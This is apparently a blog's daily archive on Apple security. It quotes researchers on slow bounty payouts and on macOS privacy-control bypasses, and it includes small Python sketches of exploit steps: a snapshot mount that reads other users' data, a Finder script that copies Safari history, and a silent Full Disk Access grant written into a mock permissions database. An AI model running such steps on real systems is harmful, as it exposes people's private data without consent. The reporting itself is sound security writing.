Archive for July 13, 2021

Tuesday, July 13, 2021

More Trouble With the Apple Security Bounty

Nicolas Brunner (Hacker News):

In March 2020 I found a way to access a user’s location permanently and without consent on any iOS 13 (or older) device. This seemed like a critical issue to me — especially with Apple’s focus on privacy in recent years.

The report got accepted and the issue was fixed in iOS 14 and I got credited on the iOS 14 security content release notes. However, as of today, Apple refuses any bounty payment, although the report at hand very clearly qualifies according to their own guidelines. Also, Apple refuses to elaborate on why the report would not qualify.


Right now, I feel robbed. However, I still hope that the security bounty program turns out to be a win-win situation for both parties. As I currently understand it, though, I do not see any reason why developers like myself should continue to contribute to it. In my case, Apple was very slow with responses (the entire process took 14 months), then turned me away without elaborating on the reasons and stopped answering e-mails.

Steve Troughton-Smith:

I’m not sure why one of the richest companies in the world feels like it needs to be so stingy with its bounty program; it feels far more like a way to keep security issues hidden & unfixed under NDA than a way to find & fix them.


If you did have knowledge of some major security flaws, why would you ever submit them to a bounty program if your last 10 submissions went nowhere and took months/years of fruitless email chasing? This stuff should be like clockwork

As an example: did you know any iOS app can read your iCloud account’s full name & email address without any kind of permissions prompt or access to your contacts? What about your phone number? Or recent searches in Photos? I figured this was worth a security report… in 2019

See also: Stop the Medium.


Update (2021-07-15): Csaba Fitzl (tweet):

Since Apple started their Apple Security Bounty program I have submitted around 50 cases to their product security team. I thought I would share my experiences working with Apple over the past 2 years. This will be useful to anyone thinking about participating in the program, and will help set expectations.


The issue is that even if you ask for an update, you don’t get any. Oftentimes, it feels like I’m sending emails into a black hole. This is really frustrating. Even a reply like “we don’t have any update at the moment” would be nice, but often that is also missed.


Compared to many programs on HackerOne or Bugcrowd, they are not an outlier here, but some cases can easily go over a year. This is especially true of design issues, which are typically addressed only in the next major release (e.g., macOS 12). I’m personally tracking 7 such cases.


Once the issue is fixed, Apple will review the case and decide if it’s eligible for a bounty or not. I think this is the worst part of the whole process. It can take an extremely long time; I have issues that were fixed in the initial release of Big Sur (half a year ago!) where a decision hasn’t been made yet. […] I think this is why you can’t rely on them for a living, unless you have a buffer for a year or two.

Update (2021-07-26): Nick Heer:

Apple says that it pays one million dollars for a “zero-click remote chain with full kernel execution and persistence” — and 50% more than that for a zero-day in a beta version — but that pales compared to the two million dollars that Zerodium is paying for the same kind of exploit.


Security researchers should not have to grovel to get paid for reporting a vulnerability, no matter how small it may seem. But why would anyone put themselves through this process when there are plenty of companies out there paying far more?

The good news is that Apple can get most of the way toward fixing this problem by throwing money at it. Apple has deep pockets; it can keep increasing payouts until the grey market cannot possibly compete. That may seem overly simplistic, but at least this security problem is truly very simple for Apple to solve.


Overview of TCC Bypasses by Accident and Design

Phil Stokes (via Hacker News):

Full Disk Access means what it says: it can be set by one user with admin rights and it grants access to all users’ data system-wide. […] When Alice grants FDA permission to the Terminal for herself, all users now have FDA permission via the Terminal as well. The upshot is that Alice isn’t only granting herself the privilege to access others’ data, she’s granting others the privilege to access her data, too.

Surprisingly, Alice’s (no doubt) unintended permissiveness also extends to unprivileged users. As reported in CVE-2020-9771, allowing the Terminal to have Full Disk Access renders all data readable without any further security challenges: the entire disk can be mounted and read even by non-admin users. Exactly how this works is nicely laid out in this blog post here, but in short any user can create and mount a local snapshot of the system and read all other users’ data.
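The snapshot trick is compact enough to sketch. The sketch below only builds the command sequence described in the CVE-2020-9771 write-ups so the two steps are easy to see; the exact `mount_apfs` flags are an assumption based on public posts, and Apple has since patched the behavior:

```python
# Sketch of the CVE-2020-9771 local-snapshot read described above.
# Flags are assumptions from public write-ups; this constructs the
# commands rather than running them.

def snapshot_read_commands(snapshot_name: str, mountpoint: str) -> list:
    """Return the command sequence an unprivileged user would run."""
    return [
        # 1. Create a local APFS (Time Machine) snapshot of the data volume.
        ["tmutil", "localsnapshot"],
        # 2. Mount that snapshot read-only somewhere world-readable.
        #    Reads inside the mounted snapshot bypass per-user protections.
        ["mount_apfs", "-o", "ro", "-s", snapshot_name,
         "/System/Volumes/Data", mountpoint],
    ]

cmds = snapshot_read_commands(
    "com.apple.TimeMachine.2021-07-13-120000.local", "/tmp/snap")
```

On a pre-patch system these would be run in order (e.g., via `subprocess`); the point is that neither step requires admin rights once the Terminal has Full Disk Access.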


Because of this complication, administrators must be aware that even if they never grant FDA permissions, or even if they lock down Full Disk Access (perhaps via MDM solution), simply allowing an application to control the Finder in the ‘Automation’ pane will bypass those restrictions. […] Granting FDA in the usual way requires an administrator password. However, one can grant consent for automation of the Finder (and thus backdoor FDA) without a password.
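To see why the Automation grant amounts to backdoor Full Disk Access: once a process may script the Finder, it can ask the Finder to copy protected files on its behalf. The snippet below is a hypothetical sketch of that pattern — the paths are illustrative and the AppleScript is an assumption, not a tested exploit:

```python
# Hypothetical sketch: driving the Finder (which has broad disk access)
# from a process that only holds the 'Automation' consent for Finder.

def finder_copy_command(src: str, dst_folder: str) -> list:
    """Build an osascript invocation asking Finder to duplicate a file."""
    script = (
        f'tell application "Finder" to duplicate '
        f'(POSIX file "{src}" as alias) to (POSIX file "{dst_folder}" as alias)'
    )
    return ["osascript", "-e", script]

cmd = finder_copy_command("/Users/alice/Library/Safari/History.db", "/tmp")
```

No administrator password is involved at any point: the only gate is the passwordless Automation consent dialog.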


Administrators need to be aware that TCC doesn’t protect against files being written to TCC-protected areas by unprivileged processes, nor does it stop files so written from being read by those processes.


Bypassing TCC By Changing the Environment

Matt Shockley (tweet, Medium):

TCC stores these user-level entitlements in a SQLite3 database on disk at $HOME/Library/Application Support/. Apple uses a dedicated daemon, tccd, for each logged-in user (and one system-level daemon) to handle TCC requests. These daemons sit idle until they receive an access request from the OS for an application attempting to access protected data.


Obviously, being able to write directly to the database completely defeats the purpose of TCC, so Apple protects the database itself with TCC and System Integrity Protection (SIP). Even a program running as root cannot modify this database unless it has the necessary private entitlements. However, the database is still technically owned and readable/writable by the currently running user, so as long as we can find a program with those entitlements, we can control the database.
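The database itself is ordinary SQLite, which is what makes a write-to-the-database attack so direct. Below is a toy reconstruction: the `access` table name and the service/client fields follow public TCC write-ups, but the real schema has many more columns, so treat this as illustrative only:

```python
import sqlite3

# Toy stand-in for the TCC database; schema heavily simplified.
db = sqlite3.connect(":memory:")
db.execute("""CREATE TABLE access (
    service TEXT,      -- e.g. a Full Disk Access-style service name
    client  TEXT,      -- identifier of the app being granted access
    allowed INTEGER    -- 1 = granted, without ever prompting the user
)""")

# What an attacker writes once the daemon reads a database they own:
db.execute("INSERT INTO access VALUES (?, ?, ?)",
           ("kTCCServiceSystemPolicyAllFiles", "com.example.evil", 1))

granted = db.execute(
    "SELECT allowed FROM access WHERE client = 'com.example.evil'"
).fetchone()[0]
```

One `INSERT` per service is all it takes; no consent dialog ever appears, because tccd believes the grant was already recorded.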


Essentially, when the TCC daemon attempts to open the database, the program tries to directly open (or create if not already existing) the SQLite3 database at $HOME/Library/Application Support/. While this seems inconspicuous at first, it becomes more interesting when you realize that you can control the location that the TCC daemon reads and writes to if you can control what the $HOME environment variable contains. […] Thus, I could set the $HOME environment variable in launchctl to point to a directory I control, restart the TCC daemon, and then directly modify the TCC database to give myself every TCC entitlement available without ever prompting the end user.

So SIP is still protecting the normal path, but the system relies on tccd, which has been redirected to a different path. Apple fixed this 4.5 months later, in July 2020.
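The core of the bug is that path resolution trusted an attacker-controlled environment variable, and that effect is easy to reproduce generically. In the Python sketch below, the filename is a placeholder (the real TCC database path is elided in the quote above); the point is only that any path resolved through $HOME follows wherever the variable points:

```python
import os
import tempfile

# Any path resolved through $HOME follows the variable, not the real
# home directory -- the same trust tccd placed in its environment.
fake_home = tempfile.mkdtemp()
os.environ["HOME"] = fake_home  # attacker-controlled (via launchctl on macOS)

# Placeholder filename; the real daemon opened its SQLite database
# somewhere under ~/Library/Application Support/.
db_path = os.path.expanduser("~/Library/Application Support/example.db")

# The "protected" path now lives in a directory the attacker owns.
assert db_path.startswith(fake_home)
```

On POSIX systems `os.path.expanduser` consults `$HOME` first, which mirrors how the redirected daemon ended up opening an attacker-controlled copy of its database.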

Patrick Wardle:

TCC continues to be a massive pain in the butt for legitimate software/app developers.

...but for hackers? Yah, not so much at all 😭😭😭😭😭

For example (as a legitimate soft dev), how can my updater tell if my app was already granted certain TCC privileges (so I don’t have to re-prompt the user)?

And why do I have to manually restart TCCd to avoid a myriad of (broken) caching issues?


Gatekeeper LaunchAgents Bypass

Csaba Fitzl:

On macOS Mojave, Gatekeeper only verifies executables that are run with the open command or that the user double-clicks. It won’t verify files that are executed through other means, like directly executing a binary (./myapp), regardless of the quarantine attribute. If you can place a plist file inside LaunchAgents/LaunchDaemons, the command inside will also be executed. Prior to Catalina, there is a way to trick users into dragging & dropping files into the LaunchAgents folder.

On macOS Catalina a lot has changed; the most notable change regarding Gatekeeper is that it will verify files executed via classic ‘exec’ methods.
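The Mojave-versus-Catalina difference can be summarized as a small decision table. This is only a toy model of the behavior as described above (launch-method names are mine, not Apple’s):

```python
# Toy model of which launch paths trigger Gatekeeper verification of a
# quarantined file, per the behavior described in the quoted post.

def gatekeeper_verifies(version: str, launch: str) -> bool:
    if version == "mojave":
        # Direct exec (./myapp) slips through on Mojave.
        return launch in {"open", "double-click"}
    if version == "catalina":
        # Catalina also verifies classic exec-style launches.
        return launch in {"open", "double-click", "exec"}
    raise ValueError(f"unmodeled macOS version: {version}")
```

This is why the LaunchAgents trick mattered on Mojave: launchd starts the plist’s command via exec, the one path Gatekeeper didn’t check.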

I don’t think that the suggested drag install trick works because it’s impossible to make a single symlink for every user’s home folder, each of which has a different username.

TeamViewer Local Privilege Escalation Vulnerability

Csaba Fitzl (tweet):

This is a rather old vulnerability I found in TeamViewer back in 2020 and reported through VCP/iDefense. TeamViewer fixed the vulnerability last November[…]

The TeamViewer macOS client used a PrivilegedHelperTool named com.teamviewer.Helper to perform specific tasks that require root permissions. Back in 2020 it used a deprecated model for IPC communication, called Distributed Objects. It was wide open: any client could invoke the remote object’s functions, and some of those led to direct privilege escalation.